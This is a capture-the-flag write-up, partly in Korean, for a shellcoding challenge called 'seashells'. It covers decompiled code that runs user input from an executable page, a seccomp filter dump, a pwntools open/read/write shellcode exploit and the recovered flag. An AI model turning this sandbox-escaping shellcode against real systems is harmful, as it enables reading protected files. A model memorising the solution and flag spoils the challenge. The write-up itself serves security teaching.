# Description
She picks seashells by the seashore. But she is very picky with what she keeps.
Author: omelette_keychain
# 분석
코드를 보면 입력 받은 buf의 데이터를 dest에 복사하고 dest에 있는 코드를 실행한다.
// Decompiled (IDA-style pseudocode) main() of the challenge binary.
// Flow: install the seccomp filter, read user bytes into a stack buffer,
// copy one page of the stack into an anonymous RWX mapping and jump to it.
int __fastcall main(int argc, const char **argv, const char **envp)
{
    size_t v3; // rdx
    int v5; // [rsp+14h] [rbp-52Ch]  -- page size returned by sysconf()
    void *dest; // [rsp+20h] [rbp-520h]  -- RWX mapping that receives the copy
    _BYTE buf[1288]; // [rsp+30h] [rbp-510h] BYREF  -- user input; read() fills at most 0x500 (1280) bytes
    unsigned __int64 v8; // [rsp+538h] [rbp-8h]  -- stack-protector canary slot
    v8 = __readfsqword(0x28u); // fs:0x28 holds the glibc stack canary on x86-64
    seccomp_initialisation(argc, argv, envp); // defined elsewhere; installs the BPF filter shown in the seccomp-tools dump below
    v3 = strlen("Give me the sea shells that you collected >>");
    write(1, "Give me the sea shells that you collected >>", v3);
    // read() returns ssize_t; it is truncated to unsigned int before the
    // compare, so only the -1 error return is caught. A short read leaves the
    // rest of buf uninitialised (and that stack content is what gets copied below).
    if ( (unsigned int)read(0, buf, 0x500u) == -1 )
    {
        perror("read failed");
        return -1;
    }
    else
    {
        v5 = sysconf(30); // 30 == _SC_PAGESIZE on glibc/Linux: v5 is the page size (typically 4096)
        // 7 == PROT_READ|PROT_WRITE|PROT_EXEC, 34 == MAP_PRIVATE|MAP_ANONYMOUS:
        // a fresh page that is writable *and* executable.
        dest = mmap(0, v5, 7, 34, -1, 0);
        if ( dest == (void *)-1LL )
        {
            perror("mmap failed");
            return -1;
        }
        else
        {
            // Copies v5 (page-size) bytes, but buf is only 1288 bytes: the copy
            // reads past buf into the rest of the frame (canary v8, saved rbp,
            // return address) -- an out-of-bounds stack read into the RWX page.
            // The user's bytes sit at the start of dest, so execution begins there.
            memcpy(dest, buf, v5);
            ((void (*)(void))dest)(); // execute the user-supplied bytes under the seccomp filter
            munmap(dest, v5); // reached only if the injected code returns
            return 0;
        }
    }
}
간단한 shellcoding 문제로 볼 수 있고, seccomp_initialisation을 통해서 syscall을 필터링하고 있다.
필터링되는 syscall을 피해 허용된 syscall만 사용하면 flag를 획득할 수 있다.
seccomp-tools 결과
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x0c 0xc000003e if (A != ARCH_X86_64) goto 0014
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x09 0xffffffff if (A != 0xffffffff) goto 0014
0005: 0x15 0x07 0x00 0x00000000 if (A == read) goto 0013
0006: 0x15 0x06 0x00 0x00000001 if (A == write) goto 0013
0007: 0x15 0x05 0x00 0x00000002 if (A == open) goto 0013
0008: 0x15 0x04 0x00 0x00000003 if (A == close) goto 0013
0009: 0x15 0x03 0x00 0x00000009 if (A == mmap) goto 0013
0010: 0x15 0x02 0x00 0x0000000b if (A == munmap) goto 0013
0011: 0x15 0x01 0x00 0x0000003c if (A == exit) goto 0013
0012: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0014
0013: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0014: 0x06 0x00 0x00 0x00000000 return KILL
Exploit 방향
read, write, open, close를 이용해서 flag를 획득하는 문제다.
# Payload
# Exploit for the "seashells" challenge (pwntools).
# The binary executes whatever is sent, inside a seccomp sandbox that only
# allows read/write/open/close/mmap/munmap/exit/exit_group (see the dump above),
# so the payload reads the flag file with open/read/write instead of spawning a shell.
from pwn import *
filename = "./seashells"
e = ELF(filename)  # loaded for convenience; not used below
p = process(filename)
context.arch = 'amd64'  # shellcraft/asm must target the binary's x86-64 ABI
# Push "./flag\0" onto the stack; rsp then points at the path string.
shellcode = shellcraft.pushstr("./flag")
# open(rsp, 0, 0): O_RDONLY; the new fd comes back in rax.
shellcode += shellcraft.open('rsp', 0, 0)
# read(fd=rax, rsp, 100): overwrite the path with the file contents.
shellcode += shellcraft.read('rax', 'rsp', 100)
# write(1, rsp, 100): print the bytes just read to stdout.
shellcode += shellcraft.write(1, 'rsp', 100)
shellcode = asm(shellcode)
# Send after the prompt. sendlineafter appends b"\n" after the shellcode; that
# byte (and the copied stack data behind it) is only reached after write() has
# already printed the flag -- the shellcode has no exit, so it presumably
# crashes afterwards, which does not matter here.
p.sendlineafter(b" >>", shellcode)
p.interactive()
# Flag
shaktictf{u_g0t_wh@t_u_w15h3d__th3_s3@sh311_f1@g}